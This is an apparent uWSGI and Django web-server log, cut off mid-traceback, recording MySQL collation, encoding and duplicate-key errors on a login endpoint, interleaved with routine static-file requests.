"/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='") +[pid: 2069|app: 0|req: 661/829] 180.160.63.35 () {48 vars in 919 bytes} [Thu Jan 14 08:11:13 2021] POST /login/ => generated 182898 bytes in 127 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 233, in login + if len(models.User.objects.filter(uid=uid, password=pwd)) != 0: + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 269, in __len__ + self._fetch_all() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all + self._result_cache = list(self._iterable_class(self)) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__ + results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='") +[pid: 2069|app: 0|req: 662/830] 180.160.63.35 () {48 vars in 919 bytes} [Thu Jan 14 08:11:14 2021] POST /login/ => generated 182898 bytes in 104 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 663/831] 219.228.146.253 () {38 vars in 865 bytes} [Thu Jan 14 08:12:49 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 2069|app: -1|req: -1/832] 219.228.146.253 () {40 vars in 865 bytes} [Thu Jan 14 08:12:49 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/833] 219.228.146.253 () {40 vars in 887 bytes} [Thu Jan 14 08:12:50 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/834] 219.228.146.253 () {40 vars in 867 bytes} [Thu Jan 14 08:12:50 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/835] 219.228.146.253 () {40 vars in 873 bytes} [Thu Jan 14 08:12:50 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/836] 219.228.146.253 () {40 vars in 869 bytes} [Thu Jan 14 08:12:50 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/837] 219.228.146.253 () {40 vars in 848 bytes} [Thu Jan 14 08:12:50 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/838] 219.228.146.253 () {40 vars in 864 bytes} [Thu Jan 14 08:12:50 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/839] 219.228.146.253 () {40 vars in 854 bytes} [Thu Jan 14 08:12:50 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/840] 219.228.146.253 () {40 vars in 846 bytes} [Thu Jan 14 08:12:50 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/841] 219.228.146.253 () {40 vars in 862 bytes} [Thu Jan 14 08:12:50 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/842] 219.228.146.253 () {40 vars in 908 bytes} [Thu Jan 14 08:12:50 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE5\\xB9\\xB2\\xE9\\xA5\\xAD...' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE5\\xB9\\xB2\\xE9\\xA5\\xAD...' for column 'uid' at row 1") +[pid: 2069|app: 0|req: 664/843] 219.228.146.253 () {48 vars in 1009 bytes} [Thu Jan 14 08:13:13 2021] POST /login/ => generated 209633 bytes in 122 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 665/844] 101.89.239.230 () {32 vars in 545 bytes} [Thu Jan 14 08:13:55 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 666/845] 101.89.19.197 () {32 vars in 587 bytes} [Thu Jan 14 08:16:31 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 667/846] 101.91.62.89 () {32 vars in 584 bytes} [Thu Jan 14 08:16:37 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 668/847] 180.160.72.163 () {38 vars in 935 bytes} [Thu Jan 14 08:28:52 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 669/848] 180.160.72.163 () {38 vars in 937 bytes} [Thu Jan 14 08:28:52 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 2069|app: -1|req: -1/849] 180.160.72.163 () {40 vars in 999 bytes} [Thu Jan 14 08:28:52 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/850] 180.160.72.163 () {40 vars in 979 bytes} [Thu Jan 14 08:28:52 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/851] 180.160.72.163 () {40 vars in 981 bytes} [Thu Jan 14 08:28:52 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/852] 180.160.72.163 () {40 vars in 985 bytes} [Thu Jan 14 08:28:52 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/853] 180.160.72.163 () {40 vars in 960 bytes} [Thu Jan 14 08:28:52 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/854] 180.160.72.163 () {40 vars in 977 bytes} [Thu Jan 14 08:28:52 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/855] 180.160.72.163 () {40 vars in 958 bytes} [Thu Jan 14 08:28:52 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/856] 180.160.72.163 () {40 vars in 974 bytes} [Thu Jan 14 08:28:52 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/857] 180.160.72.163 () {40 vars in 972 bytes} [Thu Jan 14 08:28:52 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/858] 180.160.72.163 () {40 vars in 965 bytes} [Thu Jan 14 08:28:52 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[uwsgi-http key: 188.131.132.108:8000 client_addr: 180.160.72.163 client_port: 61645] hr_write(): Broken pipe [plugins/http/http.c line 565] +[uwsgi-http key: 188.131.132.108:8000 client_addr: 180.160.72.163 client_port: 65229] hr_write(): Broken pipe [plugins/http/http.c line 565] +[pid: 2069|app: 0|req: 670/859] 180.160.72.163 () {40 vars in 1025 bytes} [Thu Jan 14 08:28:58 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 2069|app: -1|req: -1/860] 180.160.72.163 () {40 vars in 976 bytes} [Thu Jan 14 08:28:58 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/861] 180.160.72.163 () {40 vars in 959 bytes} [Thu Jan 14 08:28:58 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/862] 180.160.72.163 () {40 vars in 957 bytes} [Thu Jan 14 08:28:58 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/863] 180.160.72.163 () {40 vars in 975 bytes} [Thu Jan 14 08:28:58 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/864] 180.160.72.163 () {40 vars in 973 bytes} [Thu Jan 14 08:28:58 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/865] 180.160.72.163 () {40 vars in 1061 bytes} [Thu Jan 14 08:29:01 2021] GET /static/img/back-top-btn.png => generated 1789 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/866] 180.160.72.163 () {40 vars in 1055 bytes} [Thu Jan 14 08:29:01 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 2069|app: -1|req: -1/867] 180.160.72.163 () {40 vars in 1029 bytes} [Thu Jan 14 08:29:01 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x9F\\x90\\xE6\\x83\\xB3...' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x9F\\x90\\xE6\\x83\\xB3...' for column 'uid' at row 1") +[pid: 2069|app: 0|req: 671/868] 114.87.230.234 () {48 vars in 1116 bytes} [Thu Jan 14 08:29:06 2021] POST /login/ => generated 209959 bytes in 106 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry '111' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in 